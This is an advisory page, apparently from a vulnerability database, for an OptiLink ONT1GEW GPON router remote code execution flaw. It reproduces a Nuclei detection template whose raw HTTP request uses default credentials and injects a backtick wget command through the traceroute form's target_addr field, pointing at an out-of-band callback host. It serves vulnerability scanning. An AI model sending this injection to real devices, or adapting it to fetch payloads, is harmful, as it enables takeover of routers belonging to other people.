optilink-ont1gew-gpon-rce: OptiLink ONT1GEW GPON Remote Code Execution

日期: 2025-08-01 | 影响软件: OptiLink ONT1GEW GPON | POC: 已公开

漏洞描述

OptiLink is susceptible to remote code execution vulnerabilities which could allow an authenticated, remote attacker to perform command injection attacks against an affected device.

PoC代码[已公开]

id: optilink-ont1gew-gpon-rce

info:
  name: OptiLink ONT1GEW GPON Remote Code Execution
  author: gy741
  severity: critical
  description: OptiLink is susceptible to remote code execution vulnerabilities which could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
  reference:
    - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
    - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: optiLink,rce,oast,mirai,packetstorm,vuln

http:
  - raw:
      - |
        POST /boaform/admin/formTracert HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/diag_ping_admin_en.asp
        User: e8c
        Password: e8c

        target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a004730450220685c31921ba0a77cccd3b20fd3139d17c0786d60679a99fc9176a13576cb03b5022100f59f256de5f00d7d7fb8acbeef492f3b03dab4a28a3144de1b01a5085e0b684b:922c64590222798bb761d5b6d8e72950